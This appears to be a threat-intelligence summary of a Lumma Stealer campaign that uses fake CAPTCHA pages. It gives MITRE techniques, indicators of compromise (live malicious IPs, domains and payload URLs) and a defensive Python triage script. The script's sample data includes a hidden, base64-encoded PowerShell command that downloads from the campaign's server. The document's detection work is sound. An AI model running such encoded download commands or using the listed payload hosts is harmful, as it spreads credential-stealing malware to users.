Revealing the Threat: Lumma Stealer Malware Takes Advantage of Fake CAPTCHA Pages | CloudSEK

Lumma Stealer is being distributed through fake Google CAPTCHA pages that trick the user into triggering a PowerShell command, which downloads the malware. The campaign hosts its pages on CDNs and Amazon S3 and relies on clipboard manipulation and base64 encoding to evade detection.

Key points

  • Windows users are targeted through deceptive human verification pages.
  • The deception relies on fake Google CAPTCHA prompts to entice user interaction.
  • PowerShell commands are used to download Lumma Stealer from remote servers.
  • Malicious sites are hosted on CDNs and Amazon S3, spreading the payload.
  • Clipboard manipulation and base64 encoding are used to evade detection.
  • Recommended mitigations include user education and robust endpoint protection.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – PowerShell commands are executed to download Lumma Stealer.
  • [T1566] Phishing – Fake Google CAPTCHA pages lure users into executing malicious commands.
  • [T1105] Remote File Copy – Lumma Stealer is downloaded from remote servers using PowerShell.
  • [T1115] Clipboard Data Manipulation – Malicious PowerShell commands are copied to the clipboard via user interaction.

Indicators of Compromise

  • [IP Address] Downloader Server IP – 165.227.121.41
  • [Domain] Malicious hosting domains – heroic-genie-2b372e.netlify.app, fipydslaongos.b-cdn.net
  • [File hash] Lumma Stealer payload hashes – 7c348f51d383d6587e2beac5ff79bef2e66c31d7, e002696bb7d57315b352844cebc031e18e89f29e
  • [File name] Payload artifact – dengo.zip
  • [URL] Malicious resource URLs – http://165.227.121.41/a.txt, https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip
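As an added defender-side example (not code from the CloudSEK post), the triage below shows how the campaign's two telltale traits, base64-encoded PowerShell launched from the user's shell after a clipboard paste and a download from the listed indicators, can be surfaced from process-creation telemetry. The `parent|image|commandline` event format and the sample events are constructed for this example; the hosts are taken from the IoC list above.

```python
import base64
import re

# Hosts from this page's IoC list (IP and malicious hosting domains).
IOC_HOSTS = {"165.227.121.41", "fipydslaongos.b-cdn.net",
             "heroic-genie-2b372e.netlify.app"}

def _enc(ps: str) -> str:
    """PowerShell -EncodedCommand expects base64 of UTF-16LE text."""
    return base64.b64encode(ps.encode("utf-16le")).decode()

# Constructed sample events in a simplified "parent|image|commandline" format.
# Event 0 mimics the fake-CAPTCHA flow: explorer.exe (Run dialog) spawning an
# encoded PowerShell that fetches a.txt from the IoC IP. Events 1-2 are benign.
SAMPLE_EVENTS = [
    "explorer.exe|powershell.exe|powershell.exe -w hidden -ep bypass -enc "
    + _enc("Invoke-WebRequest http://165.227.121.41/a.txt"),
    "cmd.exe|powershell.exe|powershell.exe -NoProfile -Command Get-Date",
    "explorer.exe|powershell.exe|powershell.exe -EncodedCommand "
    + _enc("Get-ChildItem C:\\Temp"),
]

# Matches the common abbreviations of -EncodedCommand and captures the blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(line: str):
    """Return a list of reasons the event looks like the fake-CAPTCHA chain."""
    parent, _image, cmdline = line.split("|", 2)
    decoded = decode_encoded_command(cmdline)
    reasons = []
    if decoded is None:
        return reasons          # plain-text PowerShell: not this pattern
    if parent.lower() == "explorer.exe":
        reasons.append("encoded PowerShell launched from explorer.exe "
                       "(Run-dialog / pasted-clipboard pattern)")
    if any(host in decoded for host in IOC_HOSTS):
        reasons.append("decoded command references a known IoC host")
    return reasons

def triage_all(events):
    """Index -> reasons for every event that trips at least one check."""
    return {i: r for i, line in enumerate(events) if (r := triage_event(line))}
```

Event 2 still fires on the explorer.exe-plus-encoded-command heuristic alone, which is the right trade-off here: the encoding is the evasion step, so it should be reviewed even when no known indicator is present.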

Read more: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages